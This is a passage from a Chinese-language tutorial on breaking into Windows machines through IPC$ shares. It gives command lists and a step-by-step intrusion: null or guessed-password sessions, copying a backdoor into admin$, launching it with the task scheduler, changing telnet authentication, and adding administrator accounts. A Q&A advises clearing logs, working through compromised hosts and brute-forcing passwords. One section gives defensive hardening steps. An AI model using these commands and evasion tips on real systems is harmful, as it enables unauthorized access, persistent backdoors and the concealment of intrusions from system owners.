十二 入侵中可能会用到的命令 为了这份教程的完整性,我列出了ipc$入侵中的一些常用命令,如果你已经掌握了这些命令,你可以跳过这一部分看下面的内容。请注意这些命令是适用于本地还是远程,如果只适用于本地,你只能在获得远程主机的shell(如cmd,telnet等)后,才能 向远程主机执行。
1 建立/删除ipc$连接的命令
1)建立空连接: net use \\127.0.0.1\ipc$ "" /user:""
2)建立非空连接: net use \\127.0.0.1\ipc$ "密码" /user:"用户名"
3)删除连接: net use \\127.0.0.1\ipc$ /del
2 在ipc$连接中对远程主机的#作命令
1) 查看远程主机的共享资源(看不到默认共享): net view \\127.0.0.1
2) 查看远程主机的当前时间: net time \\127.0.0.1
3) 得到远程主机的netbios用户名列表: nbtstat -A 127.0.0.1
4)映射/删除远程共享: net use z: \\127.0.0.1\c 此命令将共享名为c的共享资源映射为本地z盘
net use z: /del 删除映射的z盘,其他盘类推
5)向远程主机复制文件: copy 路径\文件名 \\IP\共享目录名,如: copy c:\xinxin.exe \\127.0.0.1\c$ 即将c盘下的xinxin.exe复制到对方c盘内 当然,你也可以把远程主机上的文件复制到自己的机器里: copy \\127.0.0.1\c$\xinxin.exe c:\
6)远程添加计划任务: at \\IP 时间 程序名 如: at \\127.0.0.0 11:00 xinxin.exe 注意:时间尽量使用24小时制;如果你打算运行的程序在系统默认搜索路径(比如system32/)下则不用加路径,否则必须加全路径
3 本地命令
1)查看本地主机的共享资源(可以看到本地的默认共享) net share
2)得到本地主机的用户列表 net user
3)显示本地某用户的帐户信息 net user 帐户名
4)显示本地主机当前启动的服务 net start
5)启动/关闭本地服务 net start 服务名 net stop 服务名
6)在本地添加帐户 net user 帐户名 密码 /add
7)激活禁用的用户 net uesr 帐户名 /active:yes
8)加入管理员组 net localgroup administrators 帐户名 /add
很显然的是,虽然这些都是本地命令,但如果你在远程主机的shell中输入,比如你telnet成功后输入上面这些命令,那么这些本地输入将作用在远程主机上。
4 其他一些命令 1)telnet telnet IP 端口 telnet 127.0.0.0 23
2)用opentelnet.exe开启远程主机的telnet OpenTelnet.exe \\ip 管理员帐号 密码 NTLM的认证方式 port OpenTelnet.exe \\127.0.0.1 administrator "" 1 90 不过这个小工具需要满足四个要求: 1)目标开启了ipc$共享 2)你要拥有管理员密码和帐号 3)目标开启RemoteRegistry服务,用户就可以更改ntlm认证 4)对仅WIN2K/XP有效
3)用p***ec.exe一步获得shell,需要ipc管道支持 p***ec.exe \\IP -u 管理员帐号 -p 密码 cmd p***ec.exe \\127.0.0.1 -u administrator -p "" cmd
十三 对比过去和现今的ipc$入侵 既然是对比,那么我就先把过去的ipc$入侵步骤写给大家,都是蛮经典的步骤:
[1] C:\>net use \\127.0.0.1\ipc$ "" /user:admintitrators \\用扫到的空口令建立连接
[2] c:\>net view \\127.0.0.1 \\查看远程的共享资源
[3] C:\>copy srv.exe \\127.0.0.1\admin$\system32 \\将一次性后门srv.exe复制到对方的系统文件夹下,前提是admin$开启
[4] C:\>net time \\127.0.0.1 \\查看远程主机的当前时间
[5] C:\>at \\127.0.0.1 时间 srv.exe \\用at命令远程运行srv.exe,需要对方开启了''Task Scheduler''服务
[6] C:\>net time \\127.0.0.1 \\再次查看当前时间来估算srv.exe是否已经运行,此步可以省略
[7] C:\>telnet 127.0.0.1 99 \\开一个新窗口,用telnet远程登陆到127.0.0.1从而获得一个shell(不懂shell是什么意思?那你就把它想象成远程机器的控制权就好了,#作像DOS),99端口是srv.exe开的一次性后门的端口
[8] C:\WINNT\system32>net start telnet \\我们在刚刚登陆上的shell中启动远程机器的telnet服务,毕竟srv.exe是一次性的后门,我们需要一个长久的后门便于以后访问,如果对方的telnet已经启动,此步可省略
[9] C:\>copy ntlm.exe \\127.0.0.1\admin$\system32 \\在原来那个窗口中将ntlm.exe传过去,ntlm.exe是用来更改telnet身份验证的
[10] C:\WINNT\system32>ntlm.exe \\在shell窗口中运行ntlm.exe,以后你就可以畅通无阻的telnet这台主机了 [11] C:\>telnet 127.0.0.1 23 \\在新窗口中telnet到127.0.0.1,端口23可省略,这样我们又获得一个长期的后门
[12] C:\WINNT\system32>net user 帐户名 密码 /add C:\WINNT\system32>net uesr guest /active:yes C:\WINNT\system32>net localgroup administrators 帐户名 /add \\telnet上以后,你可以建立新帐户,激活guest,把任何帐户加入管理员组等
好了,写到这里我似乎回到了2,3年前,那时的ipc$大家都是这么用的,不过随着新工具的出现,上面提到的一些工具和命令现在已经不常用到了,那就让我们看看现在的高效而简单的ipc$入侵吧。
[1] p***ec.exe \\IP -u 管理员帐号 -p 密码 cmd \\用这个工具我们可以一步到位的获得shell
OpenTelnet.exe \\server 管理员帐号 密码 NTLM的认证方式 port \\用它可以方便的更改telnet的验证方式和端口,方便我们登陆
[2] 已经没有第二步了,用一步获得shell之后,你做什么都可以了,安后门可以用winshell,克隆就用ca吧,开终端用3389.vbe,记录密码用win2kpass,总之好的工具不少,随你选了,我就不多说了。
十四 如何防范ipc$入侵察看本地共享资源 运行-cmd-输入net share 删除共享(每次输入一个) net share ipc$ /delete net share admin$ /delete net share c$ /delete net share d$ /delete(如果有e,f,……可以继续删除)
1 禁止空连接进行枚举(此#作并不能阻止空连接的建立)
运行regedit,找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:1 如果设置为"1",一个匿名用户仍然可以连接到IPC$共享,但无法通过这种连接得到列举SAM帐号和共享信息的权限;在Windows 2000 中增加了"2",未取得匿名权的用户将不能进行ipc$空连接。建议设置为1。如果上面所说的主键不存在,就新建一个再改键值。如果你觉得改注册表麻烦,可以在本地安全设置中设置此项: 在本地安全设置-本地策略-安全选项-''对匿名连接的额外限制''
2 禁止默认共享
1)察看本地共享资源 运行-cmd-输入net share
2)删除共享(重起后默认共享仍然存在) net share ipc$ /delete net share admin$ /delete net share c$ /delete net share d$ /delete(如果有e,f,……可以继续删除)
3)停止server服务 net stop server /y (重新启动后server服务会重新开启)
4)禁止自动打开默认共享(此#作并不能关闭ipc$共享) 运行-regedit
server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。
pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:00000000。 这两个键值在默认情况下在主机上是不存在的,需要自己手动添加,修改后重起机器使设置生效。
3 关闭ipc$和默认共享依赖的服务:server服务 如果你真的想关闭ipc$共享,那就禁止server服务吧: 控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-选已禁用,这时可能会有提示说:XXX服务也会关闭是否继续,因为还有些次要的服务要依赖于server服务,不要管它。
4 屏蔽139,445端口 由于没有以上两个端口的支持,是无法建立ipc$的,因此屏蔽139,445端口同样可以阻止ipc$入侵。
1)139端口可以通过禁止NBT来屏蔽 本地连接-TCP/IT属性-高级-WINS-选‘禁用TCP/IT上的NETBIOS’一项
2)445端口可以通过修改注册表来屏蔽 添加一个键值 Hive: HKEY_LOCAL_MACHINE Key: System\Controlset\Services\NetBT\Parameters Name: SMBDeviceEnabled Type: REG_DWORD value: 0 修改完后重启机器 注意:如果屏蔽掉了以上两个端口,你将无法用ipc$入侵别人。
3)安装防火墙进行端口过滤
6 设置复杂密码,防止通过ipc$穷举出密码,我觉得这才是最好的办法,增强安全意识,比不停的打补丁要安全的多。
十五 ipc$入侵问答精选 1.进行ipc$入侵的时候,会在服务器中留下记录,有什么办法可以不让服务器发现吗?
答:留下记录是一定的,你走后用清除日志程序删除就可以了,或者用肉鸡入侵。
2.你看下面的情况是为什么,可以连接但不能复制 net use \\***.***.***.***\ipc$ "密码" /user:"用户名" 命令成功 copy icmd.exe \\***.***.***.***\admin$ 找不到网络路径 命令不成功
答:像“找不到网络路径”“找不到网络名”之类的问题,大多是因为你想要复制到的共享文件夹没有开启,所以在复制的时候会出现错误,你可以试着找找其他的共享文件夹。
3.如果对方开了IPC$,且能建立空联接,但打开C、D盘时,都要求密码,我知道是空连接没有太多的权限,但没别的办法了吗?
答:建议先用流光或者别的什么扫描软件试着猜解一下密码,如果猜不出来,只能放弃,毕竟空连接的能力有限。
4.我已经猜解到了管理员的密码,且已经ipc$连接成功了,但net view \\ip发现它没开默认共享,我该怎么办?
答:首先纠正你的一个错误,用net view \\ip是无法看到默认共享的,你可以试着将文件复制到c$,d$看看,如果都不行,说明他关闭了默认共享,那你就用opentelnet.exe或p***ec.exe吧,用法上面有。
5.ipc$连接成功后,我用下面的命令建立了一个帐户,却发现这个帐户在我自己的机器上,这是怎么回事? net uset ccbirds /add
答:ipc$建立成功只能说明你与远程主机建立了通信隧道,并不意味你取得了一个shell,只有在获得一个shell(比如telnet)之后,你才能在远程机器建立一个帐户,否则你的#作只是在本地进行。
6.我已进入了一台肉机,用的管理员帐号,可以看他的系统时间,但是复制程序到他的机子上却不行,每次都提示“拒绝访问,已复制0个文件”,是不是对方有什么服务没开,我该怎么办?
答:一般来说“拒绝访问”都是权限不够的结果,可能是你用的帐户有问题,还有一种可能,如果你想向普通共享文件夹复制文件却返回这个错误,说明这个文件夹设置的允许访问用户中不包括你(哪怕你是管理员),这一点我在上一期文章中分析了。
7.我用Win98能与对方建立ipc$连接吗?
答:理论上不可以,要进行ipc$的#作,建议用win2000,用其他#作系统会带来许多不必要的麻烦。
8.我用net use \\ip\ipc$ "" /user ""成功的建立了一个空会话,但用nbtstat -A IP 却无法导出用户列表,这是为什么?
答:空会话在默认的情况下是可以导出用户列表的,但如果管理员通过修改注册表来禁止导出列表,就会出现你所说的情况;还有可能是你自己的NBT没有打开,netstat命令是建立在NBT之上的。
9.我建立ipc$连接的时候返回如下信息:‘提供的凭据与已存在的凭据集冲突’,怎么回事?
答:呵呵,这说明你已经与目标主机建立了ipc$连接,两个主机间同时建立两个ipc$连接是不允许的。
10.我在映射的时候出现: F:\>net use h: \\211.161.134.*\e$ 系统发生 85 错误。 本地设备名已在使用中。这是怎么回事?
答:你也太粗心了吧,这说明你有一个h盘了,映射到没有的盘符吧!
11.我建立了一个连接f:\>net use \\*.*.*.*\ipc$ "123" /user:"guest" 成功了,但当我映射时出现了错误,向我要密码,怎么回事? F:\>net use h: \\*.*.*.*\c$ 密码在 \\*.*.*.*\c$ 无效。 请键入 \\*.*.*.*\c$ 的密码: 系统发生 5 错误。 拒绝访问。
答:呵呵,向你要密码说明你当前使用的用户权限不够,不能映射C$这个默认共享,想办法提升权限或者找管理员的弱口令吧!默认共享一般是需要管理员权限的。
12.我用superscan扫到了一个开了139端口的主机,但为什么不能空连接呢?
答:你混淆了ipc$与139的关系,能进行ipc$连接的主机一定开了139或445端口,但开这两个端口的主机可不一定能空连接,因为对方可以关闭ipc$共享.
13.我门局域网里的机器大多都是xp,我用流光扫描到几个administrator帐号口令是空,而且可以连接,但不能复制东西,说错误5。请问为什么?
答:xp的安全性要高一些,在安全策略的默认设置中,对本地帐户的网络登录进行身份验证的时候,默认为来宾权限,即使你用管理员远程登录,也只具有来宾权限,因此你复制文件,当然是错误5:权限不够。
14.我用net use \\192.168.0.2\ipc$ "password" /user:"administrator" 成功,可是 net use i: \\192.168.0.2\c 出现请键入 \\192.168.0.2 的密码,怎么回事情呢?我用的可是管理员呀?应该什么都可以访问呀?
答:虽然你具有管理员权限,但管理员在设置c盘共享权限时(注意:普通共享可以设置访问权限,而默认共享则不能)可能并未设置允许administrator访问,所以会出现上述问题。
15.如果自己的机器禁止了ipc$, 是不是还可以用ipc$连接别的机器?如果禁止server服务呢?
答:禁止以上两项仍可以发起ipc$连接,不过这种问题自己动手试验会更好。
16.能告诉我下面的两个错误产生的原因吗? c:\>net time \\61.225.*.* 系统发生 5 错误。 拒绝访问。
c:\>net view \\61.225.*.* 系统发生 5 错误。 拒绝访问。
答:起初遇到这个问题的时候我也很纳闷,错误5表示权限不够,可是连空会话的权限都可以完成上面的两个命令,他为什么不行呢?难道是他没建立连接?后来那个粗心的同志告诉我的确是这样,他忘记了自己已经删了ipc$连接,之后他又输入了上面那两个命令,随 之发生了错误5。
17.您看看这是怎么回事? F:\>net time 找不到时间服务器。 请键入 NET HELPMSG 3912 以获得更多的帮助。
答:答案很简单,你的命令错了,应该是net time \\ip 没输入ip地址,当然找不到服务器。view的命令也应该有ip地址,即:net view \\ip |